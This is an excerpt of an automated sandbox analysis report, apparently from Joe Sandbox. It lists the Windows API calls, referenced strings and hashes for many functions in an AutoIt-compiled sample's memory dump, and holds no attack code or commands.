MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 005A8A70
LineTo.GDI32(?,00000000,00000003), ref: 005A8A80
EndPath.GDI32(?), ref: 005A8A90
StrokePath.GDI32(?), ref: 005A8AA0

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: 880811f625384f7cafed96dc88a10d03216ccd5bd4fa63b78743ad497293b7c0
Instruction ID: d6a9bafa926ed9261b32c204509212f39831f4894a095bc47e0e22db3f1a9880
Opcode Fuzzy Hash: 880811f625384f7cafed96dc88a10d03216ccd5bd4fa63b78743ad497293b7c0
Instruction Fuzzy Hash: 12110976000149FFDB129F90DC88EAE7FACFB1A350F008052BA199A1A1C7719D59EBA0

Function 005751FD Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00575218
GetDeviceCaps.GDI32(00000000,00000058), ref: 00575229
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00575230
ReleaseDC.USER32(00000000,00000000), ref: 00575238
MulDiv.KERNEL32(000009EC,?,00000000), ref: 0057524F
MulDiv.KERNEL32(000009EC,00000001,?), ref: 00575261

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: ce413d83f2e67e5c5b2219b6865e6ddd81dea95bc3f1141dc53e6be5b01bbaae
Instruction ID: ad0b1388eaca1b18f430a971a13d0f30a7ef8ad6dc48fd6bf1e412b1780d21bf
Opcode Fuzzy Hash: ce413d83f2e67e5c5b2219b6865e6ddd81dea95bc3f1141dc53e6be5b01bbaae
Instruction Fuzzy Hash: 34014F75E00719BBEB109FA59C49A5EBFB8FB59751F044065FA04A7281D6709C04DBA0

Function 00511BC3 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 00511BF4
MapVirtualKeyW.USER32(00000010,00000000), ref: 00511BFC
MapVirtualKeyW.USER32(000000A0,00000000), ref: 00511C07
MapVirtualKeyW.USER32(000000A1,00000000), ref: 00511C12
MapVirtualKeyW.USER32(00000011,00000000), ref: 00511C1A
MapVirtualKeyW.USER32(00000012,00000000), ref: 00511C22

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: b6fc38aaa8901985c9f2a787d21690b57a47ac0ad622e25252784ae949c0b537
Instruction ID: 8104bd8a3a16777a0100d31c6e56535fe1fec174e2b76d9ba146ccab654f1ad9
Opcode Fuzzy Hash: b6fc38aaa8901985c9f2a787d21690b57a47ac0ad622e25252784ae949c0b537
Instruction Fuzzy Hash: 56016CB09027597DE3008F5A8C85B52FFE8FF19354F04411B915C4B941C7F5A864CBE5

Function 0057EB20 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0057EB30
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0057EB46
GetWindowThreadProcessId.USER32(?,?), ref: 0057EB55
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0057EB64
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0057EB6E
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0057EB75

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: cb8b2c5986061f3ecbe7529d368d2e85f1512affa14f6e349cd04dc55f1f8ae4
Instruction ID: fc39b818e2df40502db5299f8939906dcd16140d734222746a9f8807cb6daf27
Opcode Fuzzy Hash: cb8b2c5986061f3ecbe7529d368d2e85f1512affa14f6e349cd04dc55f1f8ae4
Instruction Fuzzy Hash: E4F05E72240158BFE7219B669C0EEEF3E7CEFDBB11F004159F601D6091EBA05A05E6B5

Function 00567439 Relevance: 9.0, APIs: 6, Instructions: 37windowCOMMON

Download Yara Rule

APIs

GetClientRect.USER32(?), ref: 00567452
SendMessageW.USER32(?,00001328,00000000,?), ref: 00567469
GetWindowDC.USER32(?), ref: 00567475
GetPixel.GDI32(00000000,?,?), ref: 00567484
ReleaseDC.USER32(?,00000000), ref: 00567496
GetSysColor.USER32(00000005), ref: 005674B0

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: ClientColorMessagePixelRectReleaseSendWindow
String ID:
API String ID: 272304278-0
Opcode ID: 2ded65c8e3c2f113880d184c2ae073f1e8081e6a7966a9bfc89ba16d13495d4a
Instruction ID: d1812f9935a0adfe8a119fd6e5cfcef09dae11d2db8d67be07d1dd61e9215de1
Opcode Fuzzy Hash: 2ded65c8e3c2f113880d184c2ae073f1e8081e6a7966a9bfc89ba16d13495d4a
Instruction Fuzzy Hash: 71018B31400219EFDB109F64DD08BAA7FB5FF19312F1004A0FA16A31A0CF311E45EB50

Function 00571874 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 0057187F
UnloadUserProfile.USERENV(?,?), ref: 0057188B
CloseHandle.KERNEL32(?), ref: 00571894
CloseHandle.KERNEL32(?), ref: 0057189C
GetProcessHeap.KERNEL32(00000000,?), ref: 005718A5
HeapFree.KERNEL32(00000000), ref: 005718AC

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: 7b1f133492d5ece76174093fd546ca3583e09e08d24f743fd9ffd3a0e52d2b78
Instruction ID: 53388d2a26a516a9766c5c590047ea269dd84adecef78addd8aa7507263693c6
Opcode Fuzzy Hash: 7b1f133492d5ece76174093fd546ca3583e09e08d24f743fd9ffd3a0e52d2b78
Instruction Fuzzy Hash: 63E0E536204101BBDB015FA1ED0C90ABF79FF6AB22B108625F22581070CB329425EF50

Function 0051BBE0 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 232COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 0051BEB3

Strings

D%^, xrefs: 0051BCA2
D%^D%^, xrefs: 0051BCA5
D%^, xrefs: 0051BDED, 0051BD91, 0051BD1B
D%^, xrefs: 0051BE9A

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: Init_thread_footer
String ID: D%^$D%^$D%^$D%^D%^
API String ID: 1385522511-1929028606
Opcode ID: ee0637ec5ae8d1e99c32a99323fdec80142ee181e792a72d4f7fcefe397a9730
Instruction ID: 6f991f027e25756a3003fd0b7dcf529f9e945aea5314bd44430ac6a76bf9f4a1
Opcode Fuzzy Hash: ee0637ec5ae8d1e99c32a99323fdec80142ee181e792a72d4f7fcefe397a9730
Instruction Fuzzy Hash: D6913875A0020ACFEB18CF59C0906EABBF1FF58314F24856AD985AB351E731AD81DBD0

Function 00597B7E Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 230COMMON

Download Yara Rule

APIs

Part of subcall function 00530242: EnterCriticalSection.KERNEL32(005E070C,005E1884,?,?,0052198B,005E2518,?,?,?,005112F9,00000000), ref: 0053024D
Part of subcall function 00530242: LeaveCriticalSection.KERNEL32(005E070C,?,0052198B,005E2518,?,?,?,005112F9,00000000), ref: 0053028A

Part of subcall function 00519CB3: _wcslen.LIBCMT ref: 00519CBD

Part of subcall function 005300A3: __onexit.LIBCMT ref: 005300A9

__Init_thread_footer.LIBCMT ref: 00597BFB

Part of subcall function 005301F8: EnterCriticalSection.KERNEL32(005E070C,?,?,00528747,005E2514), ref: 00530202
Part of subcall function 005301F8: LeaveCriticalSection.KERNEL32(005E070C,?,00528747,005E2514), ref: 00530235

Strings

+TV, xrefs: 00597E2E
G, xrefs: 00597C7F
5, xrefs: 00597C78
Variable must be of type 'Object'., xrefs: 00597C3A

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
String ID: +TV$5$G$Variable must be of type 'Object'.
API String ID: 535116098-200929741
Opcode ID: 48dc413d81cd788be3cb353284e0215ff9e5569f412c98056682657defb21b42
Instruction ID: 5f0fb7d791387c32185073a1c367636e123ab176c65c60e18ac2b4aa22c28088
Opcode Fuzzy Hash: 48dc413d81cd788be3cb353284e0215ff9e5569f412c98056682657defb21b42
Instruction Fuzzy Hash: 8A919D74A1420AEFCF04EF54D8959ADBFB5FF89300F14845AF8469B292DB71AE81CB50

Function 0057C5D0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 191windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00517620: _wcslen.LIBCMT ref: 00517625

GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0057C6EE
_wcslen.LIBCMT ref: 0057C735
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0057C79C
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0057C7CA

Strings

0, xrefs: 0057C6AF

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: ItemMenu$Info_wcslen$Default
String ID: 0
API String ID: 1227352736-4108050209
Opcode ID: 3fd393b5792759dafc95e2defe1e60a87d8efefa5b2dae27fc8ef2cce0cb0728
Instruction ID: a3dda11ab15fac253c6db574705e2fd073e956b4adf7794585aac684035722c4
Opcode Fuzzy Hash: 3fd393b5792759dafc95e2defe1e60a87d8efefa5b2dae27fc8ef2cce0cb0728
Instruction Fuzzy Hash: 9C51DF716043019BD7199F28E889B6B7FE8FF89310F048A2DF999D31D1DB70D944AB52

Function 0059AD64 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON

Download Yara Rule

APIs

ShellExecuteExW.SHELL32(0000003C), ref: 0059AEA3

Part of subcall function 00517620: _wcslen.LIBCMT ref: 00517625

GetProcessId.KERNEL32(00000000), ref: 0059AF38
CloseHandle.KERNEL32(00000000), ref: 0059AF67

Strings

@, xrefs: 0059AE72
<, xrefs: 0059AE6B

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: CloseExecuteHandleProcessShell_wcslen
String ID: <$@
API String ID: 146682121-1426351568
Opcode ID: f1d1d86bac1d1007f8e0dc77f8cd5eedb306a02c3a534276944668214863cc78
Instruction ID: 90671fb062b8a2f915692e78eef52098666e0e30d31774189c009a972bd22642
Opcode Fuzzy Hash: f1d1d86bac1d1007f8e0dc77f8cd5eedb306a02c3a534276944668214863cc78
Instruction Fuzzy Hash: 55715574A0021A9FDF14DF54C488A9EBBF5FF48300F048499E816AB392DB31ED85CBA1

Function 0057719E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00577206
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0057723C
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0057724D
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 005772CF

Strings

DllGetClassObject, xrefs: 00577242

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: DllGetClassObject
API String ID: 753597075-1075368562
Opcode ID: 80f6784be5d728d7666e60af358c3003d011ee086498d1c3f4699d5c60d96ee3
Instruction ID: da2a720d7b9e695153c1b04487fd3d582e97116edaf2c8853fbfc902e3e55f44
Opcode Fuzzy Hash: 80f6784be5d728d7666e60af358c3003d011ee086498d1c3f4699d5c60d96ee3
Instruction Fuzzy Hash: BE417F75604208EFDB15CF54E884A9A7FB9FF49310F14C4A9BD199F20AD7B0DA44EBA0

Function 005A2F17 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowlibraryCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 005A2F8D
LoadLibraryW.KERNEL32(?), ref: 005A2F94
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 005A2FA9
DestroyWindow.USER32(?), ref: 005A2FB1

Strings

SysAnimate32, xrefs: 005A2F68

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: MessageSend$DestroyLibraryLoadWindow
String ID: SysAnimate32
API String ID: 3529120543-1011021900
Opcode ID: 03ab5e489a4027317a90e1f0d6a2ae0bb6f6a0279b32785d7187ffa461151d4c
Instruction ID: 96ab904e3b7256b38d47e8eba9819b34847afc57450e7fba80572e2985b0c4f6
Opcode Fuzzy Hash: 03ab5e489a4027317a90e1f0d6a2ae0bb6f6a0279b32785d7187ffa461151d4c
Instruction Fuzzy Hash: CF219A71204209AFEB108F68DC87EBF3BB9FB5A364F104619FA50D6190D771DC91AB60

Function 00534D6D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00534D1E,005428E9,?,00534CBE,005428E9,005D88B8,0000000C,00534E15,005428E9,00000002), ref: 00534D8D
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00534DA0
FreeLibrary.KERNEL32(00000000,?,?,?,00534D1E,005428E9,?,00534CBE,005428E9,005D88B8,0000000C,00534E15,005428E9,00000002,00000000), ref: 00534DC3

Strings

mscoree.dll, xrefs: 00534D86
CorExitProcess, xrefs: 00534D98

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 974339bd7cf61aa76d78f159d82908e21f210110e3a7a5bedf94b514405cbfd3
Instruction ID: 692752c2c850a5c8ed03e6f098b84b58c0440c771ae0dc7cf6b7e5924add74c1
Opcode Fuzzy Hash: 974339bd7cf61aa76d78f159d82908e21f210110e3a7a5bedf94b514405cbfd3
Instruction Fuzzy Hash: CDF03C34A40209ABDB119B94DC49BAEBFE5FB54751F0001A5E806A62A0CB70A944DE90

Function 00514E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,00514EDD,?,005E1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00514E9C
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00514EAE
FreeLibrary.KERNEL32(00000000,?,?,00514EDD,?,005E1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00514EC0

Strings

kernel32.dll, xrefs: 00514E94
Wow64DisableWow64FsRedirection, xrefs: 00514EA8

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 145871493-3689287502
Opcode ID: 5d36be5614eb4e6998002b964ab54e41cd091c887bffed96b6f490ff2449181c
Instruction ID: 16283ffd9647496279248e6936e60fcdeb8308ace92cc0f5365f1196ffeef1e6
Opcode Fuzzy Hash: 5d36be5614eb4e6998002b964ab54e41cd091c887bffed96b6f490ff2449181c
Instruction Fuzzy Hash: 54E08635B016225BE33117257C18B9F7E58BF93B627050215FC04D2200DB60CD4598A2

Function 00514E59 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,00553CDE,?,005E1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00514E62
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00514E74
FreeLibrary.KERNEL32(00000000,?,?,00553CDE,?,005E1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00514E87

Strings

kernel32.dll, xrefs: 00514E5B
Wow64RevertWow64FsRedirection, xrefs: 00514E6E

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 145871493-1355242751
Opcode ID: 8b0b7506932a8cdee092e827fff0d333b0eeb814c379298c8e358e1370f63e03
Instruction ID: c00cc8ec08d002cd9b4a5957fddf67c7e2e60ced3bcc97b4d2ec27bf5b7f19f1
Opcode Fuzzy Hash: 8b0b7506932a8cdee092e827fff0d333b0eeb814c379298c8e358e1370f63e03
Instruction Fuzzy Hash: 17D0123560262257A7321B257C18DCF7E1CBF87B513050715F905A6214DF61CD46D9E1

Function 0059A387 Relevance: 7.8, APIs: 5, Instructions: 256COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 0059A427
OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0059A435
GetProcessIoCounters.KERNEL32(00000000,?), ref: 0059A468
CloseHandle.KERNEL32(?), ref: 0059A63D

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: Process$CloseCountersCurrentHandleOpen
String ID:
API String ID: 3488606520-0
Opcode ID: 70071c8f94f8d9fdefe7975291c013445fed951f668cd860608ae6e87da2c9fc
Instruction ID: a1d191c2bac256b3c28d0f258f2a557af3329cf0ad95e8c8a8494c0d65edd18f
Opcode Fuzzy Hash: 70071c8f94f8d9fdefe7975291c013445fed951f668cd860608ae6e87da2c9fc
Instruction Fuzzy Hash: BCA160716043019FEB20DF24D88AB2ABBE5BF84714F14885DF55A9B3D2DB71EC418B92

Function 0054BB27 Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,005B3700), ref: 0054BB91
WideCharToMultiByte.KERNEL32(00000000,00000000,005E121C,000000FF,00000000,0000003F,00000000,?,?), ref: 0054BC09
WideCharToMultiByte.KERNEL32(00000000,00000000,005E1270,000000FF,?,0000003F,00000000,?), ref: 0054BC36
_free.LIBCMT ref: 0054BB7F

